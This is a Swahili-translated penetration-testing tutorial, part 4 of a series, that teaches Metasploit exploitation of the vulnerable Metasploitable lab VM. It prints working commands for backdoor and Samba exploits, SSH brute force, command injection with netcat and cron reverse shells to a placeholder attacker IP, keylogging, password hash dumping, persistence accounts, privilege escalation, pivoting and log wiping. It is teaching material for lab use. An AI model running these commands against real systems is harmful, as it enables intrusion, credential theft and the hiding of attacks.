Toleo lililotafsiriwa: Exploitation: From Vulnerability to Shell

Njia ya Hacker: Mfululizo wa Sehemu 5

Sehemu ya 1: Utangulizi → Sehemu ya 2: Umahiri wa Flipper → Sehemu ya 3: Misingi ya Kali → Sehemu ya 4: Exploitation → Sehemu ya 5: Ukaguzi Kamili

Katika Sehemu 1-3, ulijenga toolkit yako. Unaweza kunakili beji, kuchora ramani za mitandao, kunasa handshakes, na kutambua kila huduma inayofanya kazi kwenye lengo. Sasa unaona udhaifu kila mahali. Lakini kuona udhaifu na kuutumia ni ujuzi tofauti kabisa.

Hapa ndipo mambo yanakuwa ya kweli. Leo utajifunza kutumia Metasploit Framework, chombo kile kile kinachotumiwa na wataalam wa penetration testing duniani kote. Utafaidika na udhaifu wako wa kwanza, utaimarisha persistence, utapandisha mamlaka, na utajifunza kufanya pivot kupitia mtandao.

Sehemu ya 1: Kujenga Maabara Yako ya Mashambulizi

Kabla ya kutumia udhaifu wowote, unahitaji malengo. Wataalam wa kweli wa penetration testing hutumia mazingira ya maabara yaliyotengwa yenye mashine zenye udhaifu kwa makusudi. Utafanya vivyo hivyo.

Mpangilio Muhimu wa Maabara

Utahitaji Nini

• Kali Linux VM - Mashine yako ya mashambulizi (kutoka Sehemu ya 3)
• Metasploitable 2 - Linux VM yenye udhaifu kwa makusudi (SourceForge)
• Metasploitable 3 - Windows/Linux VM yenye udhaifu (GitHub)
• DVWA - Damn Vulnerable Web Application (GitHub)
• VulnHub VMs - Mashine zenye udhaifu za mtindo wa CTF (vulnhub.com)

Mradi: Mpangilio wa Mtandao wa Maabara

Muda: Dakika 45

1. Pakua Metasploitable 2 kutoka SourceForge
2. Ingiza kwenye VirtualBox/VMware
3. Sanidi mtandao: Weka Kali na Metasploitable kwenye "Host-Only" au "Internal Network"
4. Anzisha Metasploitable (kuingia kwa chaguo-msingi: msfadmin / msfadmin)
5. Andika anwani ya IP: ifconfig
6. Kutoka Kali, thibitisha muunganisho: ping METASPLOITABLE_IP
7. Fanya uchunguzi wa awali: sudo nmap -sV -sC METASPLOITABLE_IP

Thibitisho: Unapaswa kuona bandari nyingi zilizofunguliwa. Metasploitable imebuniwa kuvunjwa.

Uchunguzi wako wa nmap wa Metasploitable unapaswa kuonyesha huduma kama FTP, SSH, Telnet, SMTP, HTTP, Samba, MySQL, PostgreSQL, na nyinginezo, nyingi zikiendesha matoleo ya zamani yenye udhaifu. Hii ni uwanja wako wa mazoezi.

Sehemu ya 2: Misingi ya Metasploit Framework

Metasploit si chombo tu. Ni mfumo mzima wa ikolojia. Una maelfu ya exploits, payloads, moduli za msaada, na zana za post-exploitation. Kuelewa muundo wake ni muhimu.

Kuanzisha Metasploit

bash# Initialize the database (first time only)
sudo msfdb init

# Start Metasploit console
msfconsole

# You'll see the Metasploit banner and prompt:
msf6 >

Muundo wa Metasploit

Metasploit inapanga kila kitu katika moduli:

• Exploits - Msimbo unaotumia udhaifu
• Payloads - Msimbo unaofanya kazi baada ya exploitation (shells, meterpreter)
• Auxiliary - Scanners, fuzzers, na zana nyingine
• Post - Moduli za post-exploitation kwa persistence, pivoting
• Encoders - Kuficha payloads ili kuepuka utambuzi

bash# Search for modules
msf6 > search type:exploit platform:linux smb

# Search by CVE
msf6 > search cve:2017-0144

# Search by name
msf6 > search vsftpd

# Get info about a module
msf6 > info exploit/unix/ftp/vsftpd_234_backdoor

Mtiririko wa Kazi wa Exploitation

Kila exploitation katika Metasploit inafuata muundo ule ule:

1. Chagua exploit - use exploit/path/to/module
2. Weka chaguo - IP ya lengo, bandari, stakabadhi
3. Chagua payload - Nini kinaendesha baada ya exploitation
4. Tekeleza - exploit au run

Sehemu ya 3: Exploit Yako ya Kwanza

Hebu tutumie moja ya backdoors maarufu zaidi katika historia: vsftpd 2.3.4 backdoor. Mwaka 2011, mtu fulani aliingiza backdoor katika msimbo wa chanzo wa vsftpd. Ukituma jina la mtumiaji linalomalizika na :), shell inafunguka kwenye bandari 6200.

Metasploitable 2 inaendesha toleo hili hasa.

bash# Start Metasploit
msfconsole

# Search for the exploit
msf6 > search vsftpd

# Select the exploit
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor

# View required options
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

# Set the target
msf6 exploit(...) > set RHOSTS 192.168.56.101

# Run the exploit
msf6 exploit(...) > exploit

# If successful:
[*] Command shell session 1 opened
[+] Got shell!

# You now have a root shell on the target
whoami
root
id
uid=0(root) gid=0(root)

Hiyo ndiyo. Huduma moja yenye udhaifu, exploit moja, ufikiaji wa root. Ndiyo maana kusasisha programu ni muhimu.

Mradi: Kutumia vsftpd Backdoor

Muda: Dakika 15

Masharti ya awali: Metasploitable 2 inafanya kazi, Kali kwenye mtandao ule ule

1. Thibitisha FTP inafanya kazi: nmap -sV -p 21 TARGET_IP
2. Anzisha msfconsole
3. Tafuta, chagua, na sanidi exploit ya vsftpd
4. Endesha exploit
5. Ukipata shell, chunguza: cat /etc/shadow

Vigezo vya mafanikio: Unaweza kusoma /etc/shadow, ambayo root pekee anaweza kufikia.

Sehemu ya 4: Kuelewa Payloads

Payload ni kile kinachoendesha baada ya exploit kufanikiwa. Shell ya msingi tuliyopata hapo juu ni rahisi, lakini Metasploit inatoa chaguo zenye nguvu zaidi.

Aina za Payloads

• Singles - Payloads zinazojitegemea, za matumizi moja (kuongeza mtumiaji, kuendesha amri)
• Stagers - Payloads ndogo zinazoweka muunganisho, kisha kupakua payload kuu
• Stages - Payload kuu inayopakuliwa na stager (Meterpreter)

bash# List compatible payloads for current exploit
msf6 exploit(...) > show payloads

# Set a specific payload
msf6 exploit(...) > set PAYLOAD linux/x86/meterpreter/reverse_tcp

# Payload naming convention:
# platform/arch/payload_type/connection_type
# linux/x86/meterpreter/reverse_tcp
# windows/x64/shell/bind_tcp

Reverse dhidi ya Bind Shells

• Reverse shell - Lengo linaunganisha kurudi kwako. Bora kwa kupita firewalls (trafiki ya kutoka kawaida inaruhusiwa).
• Bind shell - Lengo linafungua bandari ili uunganishe. Rahisi kugundua, mara nyingi inazuiwa na firewalls.

bash# For reverse shells, you must set your IP
msf6 exploit(...) > set LHOST YOUR_KALI_IP
msf6 exploit(...) > set LPORT 4444

# Metasploit starts a listener automatically when you exploit

Meterpreter: Payload Bora Zaidi

Meterpreter ni payload yenye nguvu zaidi ya Metasploit. Inafanya kazi kabisa kwenye kumbukumbu (hakuna faili kwenye diski), inatoa mawasiliano yaliyosimbwa kwa njia fiche, na inajumuisha makumi ya amri zilizojengwa ndani kwa post-exploitation.

bash# Meterpreter commands (once you have a session)
meterpreter > sysinfo          # System information
meterpreter > getuid           # Current user
meterpreter > pwd              # Current directory
meterpreter > ls               # List files
meterpreter > download file    # Download file to Kali
meterpreter > upload file      # Upload file to target
meterpreter > shell            # Drop to system shell
meterpreter > hashdump         # Dump password hashes
meterpreter > screenshot       # Take screenshot
meterpreter > keyscan_start    # Start keylogger
meterpreter > keyscan_dump     # Dump keystrokes
meterpreter > background       # Background this session

Sehemu ya 5: Mbinu Zaidi za Exploitation

Kutumia Samba (SMB)

Metasploitable 2 inaendesha toleo lenye udhaifu la Samba. Hii inafanana na exploit maarufu ya EternalBlue iliyotumiwa katika WannaCry.

bash# Search for Samba exploits
msf6 > search type:exploit samba

# The "username map script" vulnerability
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(...) > set RHOSTS TARGET_IP
msf6 exploit(...) > set PAYLOAD cmd/unix/reverse
msf6 exploit(...) > set LHOST YOUR_IP
msf6 exploit(...) > exploit

[*] Command shell session 2 opened

Kutumia Stakabadhi Dhaifu

Si kila uvunjaji unahitaji udhaifu wa programu. Nywila dhaifu ziko kila mahali.

bash# SSH brute-force auxiliary module
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS TARGET_IP
msf6 auxiliary(...) > set USERNAME root
msf6 auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf6 auxiliary(...) > set STOP_ON_SUCCESS true
msf6 auxiliary(...) > run

# For known credentials
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set USERNAME msfadmin
msf6 auxiliary(...) > set PASSWORD msfadmin
msf6 auxiliary(...) > run

[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'

Exploitation ya Programu za Wavuti

Metasploitable inajumuisha programu kadhaa za wavuti zenye udhaifu. Hebu tutumie PHP code injection.

bash# First, browse to http://TARGET/mutillidae/
# Find the "User Lookup" page (vulnerable to SQLi and code injection)

# Use Metasploit's web exploits
msf6 > search type:exploit php

# Or exploit manually with command injection:
# In vulnerable input field:
; cat /etc/passwd
; nc -e /bin/bash YOUR_IP 4444

Mradi: Kutumia Huduma Tatu Tofauti

Muda: Dakika 60

Lengo: Metasploitable 2

1. Tumia vsftpd backdoor (FTP - bandari 21) na upate root shell
2. Tumia Samba usermap_script (SMB - bandari 139/445) na upate root shell
3. Vunja stakabadhi za SSH (bandari 22) kwa kutumia auxiliary/scanner/ssh/ssh_login
4. Andika kila exploitation: moduli iliyotumiwa, chaguo zilizowekwa, matokeo

Bonasi: Chunguza programu za wavuti kwenye bandari 80 na upate njia za exploitation za mkono.

Sehemu ya 6: Post-Exploitation

Kupata shell ni mwanzo tu. Majaribio halisi ya penetration yanahitaji kuonyesha nini mshambuliaji angeweza kufanya na ufikiaji huo. Hii ni post-exploitation.

Ukusanyaji wa Taarifa

text# From a Meterpreter session
meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux 2.6.24
Architecture: i686
Meterpreter : x86/linux

# Network information
meterpreter > ipconfig
meterpreter > route
meterpreter > arp

bash# From a regular shell
cat /etc/passwd       # All users
cat /etc/shadow       # Password hashes (requires root)
cat /etc/hosts        # Network mappings
netstat -tulpn        # Open ports
ps aux                # Running processes
crontab -l            # Scheduled tasks

Ukusanyaji wa Stakabadhi

text# Dump password hashes
meterpreter > hashdump
root:$1$XtqVHIvN$0MnR7..........:0:0:root:/root:/bin/bash
msfadmin:$1$XN10Zj2c$Rt/zzC........:1000:1000::/home/msfadmin:/bin/bash

bash# Or from shell
cat /etc/shadow

# Crack hashes offline with John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Or hashcat (faster with GPU)
hashcat -m 500 hashes.txt /usr/share/wordlists/rockyou.txt

Kuimarisha Persistence

Persistence inamaanisha kudumisha ufikiaji hata baada ya kuanzisha upya au wakati njia yako ya awali ya exploit imesahihishwa.

bash# Add a new user with sudo access
useradd -m -s /bin/bash hacker
echo "hacker:password123" | chpasswd
usermod -aG sudo hacker

# Add SSH key for passwordless access
mkdir /home/hacker/.ssh
echo "YOUR_PUBLIC_KEY" >> /home/hacker/.ssh/authorized_keys

# Cron-based reverse shell (reconnects every minute)
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'" >> /var/spool/cron/crontabs/root

# Metasploit persistence module
meterpreter > run persistence -h
meterpreter > run persistence -X -i 60 -p 4444 -r YOUR_IP

Persistence = Ushahidi

Kila njia ya persistence inaacha athari. Katika jaribio la kweli la penetration, unaandika unachoweza kufanya, kisha unasafisha. Kuacha backdoors kwenye mifumo ya wateja si kitaalamu na inaweza kuwa kinyume cha sheria. Katika maabara yako, jaribu kila kitu, lakini elewa matokeo yake.

Sehemu ya 7: Kupandisha Mamlaka

Mara nyingi unapata ufikiaji wa awali kama mtumiaji wa mamlaka ya chini. Kupandisha hadi root/admin kawaida inahitajika kufikia malengo ya jaribio.

Kupandisha Mamlaka kwenye Linux

bash# Current user context
id
whoami

# SUID binaries (run as owner regardless of who executes)
find / -perm -4000 -type f 2>/dev/null

# World-writable directories
find / -writable -type d 2>/dev/null

# Sudo permissions
sudo -l

# Kernel version (for kernel exploits)
uname -a

# Running processes as root
ps aux | grep root

# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*

Skripti za Kiotomatiki za Uorodheshaji

• LinPEAS - github.com/carlospolop/PEASS-ng
• LinEnum - github.com/rebootuser/LinEnum
• linux-exploit-suggester - GitHub

bash# Upload and run LinPEAS
# From Kali, host the script:
python3 -m http.server 8000

# From target:
wget http://YOUR_IP:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

# LinPEAS highlights potential vectors in colors:
# RED/YELLOW = Critical findings, likely exploitable

Njia za Kawaida za Privesc kwenye Linux

bash# 1. Sudo misconfiguration
sudo -l
# If you see: (ALL) NOPASSWD: /usr/bin/vim
sudo vim -c '!sh'
# Instant root shell

# 2. SUID binary exploitation
# If /usr/bin/find has SUID bit:
find . -exec /bin/sh -p \;

# 3. Writable /etc/passwd
# Generate password hash:
openssl passwd -1 mypassword
# Add to /etc/passwd:
echo 'hacker:$1$xyz$...:0:0:root:/root:/bin/bash' >> /etc/passwd

# 4. Cron job exploitation
# If a cron runs a writable script as root:
echo 'chmod +s /bin/bash' >> /path/to/cron/script
# Wait for cron, then:
/bin/bash -p
# Root shell

Kupandisha Mamlaka kwenye Windows

Ikiwa unajaribu malengo ya Windows (Metasploitable 3), mbinu ni tofauti:

text# From Meterpreter on Windows
meterpreter > getuid
Server username: VICTIM\lowpriv_user

meterpreter > getsystem
[+] ...got SYSTEM

# If getsystem fails, try:
meterpreter > run post/multi/recon/local_exploit_suggester

# Or background and use specific exploit:
meterpreter > background
msf6 > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
msf6 exploit(...) > set SESSION 1
msf6 exploit(...) > exploit

Mradi: Kupandisha kutoka Mtumiaji hadi Root

Muda: Dakika 45

Hali: Una ufikiaji wa SSH kwa Metasploitable kama msfadmin (si root)

1. SSH kwa Metasploitable: ssh msfadmin@TARGET
2. Endesha id kuthibitisha huna root
3. Angalia ruhusa za sudo: sudo -l
4. Tafuta SUID binaries: find / -perm -4000 2>/dev/null
5. Pakia na uendeshe LinPEAS
6. Tambua njia ya privesc na uitumie

Lengo: Pata root shell kwa kutumia kitu kingine zaidi ya kutumia huduma ya mtandao.

Sehemu ya 8: Pivoting

Pivoting ni kutumia mfumo uliokuwa umevunjwa kushambulia mifumo mingine ambayo haipatikani moja kwa moja kutoka kwa mashine yako ya mashambulizi. Hivi ndivyo washambuliaji wanavyosonga kwa upande kupitia mitandao.

Hali ya Pivot

Fikiria mtandao huu:

• Kali yako: 192.168.1.100
• Mwenyeji aliyevunjwa: 192.168.1.50 (pia ameunganishwa na mtandao wa ndani 10.0.0.0/24)
• Lengo: 10.0.0.10 (linapatikana tu kutoka 192.168.1.50)

Huwezi kufikia 10.0.0.10 moja kwa moja. Lakini kupitia mwenyeji aliyevunjwa, unaweza.

Uelekezaji wa Metasploit

text# After getting a Meterpreter session on the pivot host
meterpreter > ipconfig
# Shows two interfaces: 192.168.1.50 and 10.0.0.50

meterpreter > run autoroute -s 10.0.0.0/24
[+] Added route to 10.0.0.0/24 via session 1

meterpreter > background

# Now Metasploit routes 10.0.0.0/24 traffic through session 1
msf6 > route print

# Scan the internal network
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(...) > set RHOSTS 10.0.0.1-254
msf6 auxiliary(...) > set PORTS 22,80,443,445
msf6 auxiliary(...) > run

# Exploit internal targets through the pivot
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(...) > set RHOSTS 10.0.0.10
msf6 exploit(...) > exploit

SOCKS Proxy kwa Ufikiaji Kamili

bash# Set up a SOCKS proxy through Meterpreter
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(...) > set SRVPORT 1080
msf6 auxiliary(...) > run

# Configure proxychains (/etc/proxychains4.conf)
socks5 127.0.0.1 1080

# Now any tool can access the internal network
proxychains nmap -sT -Pn 10.0.0.10
proxychains curl http://10.0.0.10
proxychains ssh [email protected]

SSH Tunneling (Bila Metasploit)

bash# Dynamic port forwarding (SOCKS proxy)
ssh -D 1080 user@pivot_host

# Local port forwarding (specific port)
ssh -L 8080:10.0.0.10:80 user@pivot_host
# Now localhost:8080 reaches 10.0.0.10:80

# Remote port forwarding (expose your service to internal network)
ssh -R 4444:localhost:4444 user@pivot_host
# Internal hosts can reach your port 4444 via pivot_host:4444

Sehemu ya 9: Kuficha Nyayo

Wataalam wa penetration testing wanaandika ufikiaji wao lakini wanasafisha baadaye. Kuelewa jinsi washambuliaji wanavyoficha nyayo pia husaidia kutambua uvamizi.

bash# Clear bash history
history -c
cat /dev/null > ~/.bash_history

# Clear auth logs (requires root)
echo "" > /var/log/auth.log
echo "" > /var/log/wtmp
echo "" > /var/log/btmp

# Remove specific log entries
sed -i '/YOUR_IP/d' /var/log/auth.log

# Timestomp (change file timestamps)
touch -r /etc/passwd /path/to/your/file

# Meterpreter
meterpreter > clearev          # Clear Windows event logs
meterpreter > timestomp file -m "01/01/2020 12:00:00"

Katika Kazi Halisi: Usifanye Hivi

Wataalam wa penetration testing wanaandika ufikiaji wao na kuripoti matokeo yao. Hawayafichi. Kufuta kumbukumbu kunaharibu ushahidi ambao walinzi wanahitaji kuelewa njia ya shambulio. Fanya mazoezi ya mbinu hizi tu katika mazingira yako ya maabara yaliyotengwa.

Njia ya Hacker

Mfululizo wa sehemu 5 unaokupeleka kutoka mwenye udadisi hadi mwenye uwezo.

Sehemu ya 1: Utangulizi Sehemu ya 2: Umahiri wa Flipper Sehemu ya 3: Misingi ya Kali Sehemu ya 4: Exploitation ✓ Sehemu ya 5: Ukaguzi Kamili

Orodha ya Ukaguzi wa Sehemu ya 4

☐ Mpangilio wa Maabara: Metasploitable 2 inafanya kazi, mtandao uliotengwa umesanidiwa

☐ Metasploit: Hifadhidata imeanzishwa, urambazaji wa msingi umejulikana

☐ Exploit ya Kwanza: vsftpd backdoor imetumika, root shell imepatikana

☐ Njia Nyingi: FTP, SMB zimetumika na stakabadhi za SSH zimevunjwa

☐ Post-Exploitation: Hash za nywila zimetolewa, mfumo umeorodheshwa

☐ Kupandisha Mamlaka: Kupandisha kutoka mtumiaji hadi root bila exploit ya mtandao

☐ Pivoting: Dhana za autoroute na SOCKS proxy zimeeleweka

☐ Uandishi: Exploits zote zimeandikwa na hatua na ushahidi

Kinachofuata

Umejifunza kutumia udhaifu, kupandisha mamlaka, na kufanya pivot kupitia mitandao. Umeona jinsi udhaifu mmoja unavyokuwa uvunjaji kamili haraka. Unaelewa wataalam wa penetration testing wanafanya nini.

Katika Sehemu ya 5, tunaunganisha kila kitu pamoja. Utafanya ukaguzi kamili wa usalama kutoka mwanzo hadi mwisho:

• Upeo na sheria za ushiriki
• Mbinu kamili ya uchunguzi
• Exploitation ya utaratibu
• Post-exploitation kamili
• Kuripoti kitaalamu
• Mapendekezo ya kurekebisha

Sehemu ya 5 ni kilele. Kila kitu ulichojifunza katika mfululizo huu kinaunganika kuwa mbinu ya ulimwengu halisi unayoweza kutumia kutathmini usalama wa mtandao wowote ulioruhusiwa kujaribu.

Umejifunza mbinu. Sasa unajifunza mbinu ya utaratibu. Sehemu ya 5 inabadilisha ujuzi kuwa mtiririko kamili wa kazi wa penetration testing.

Tutaonana katika Sehemu ya 5.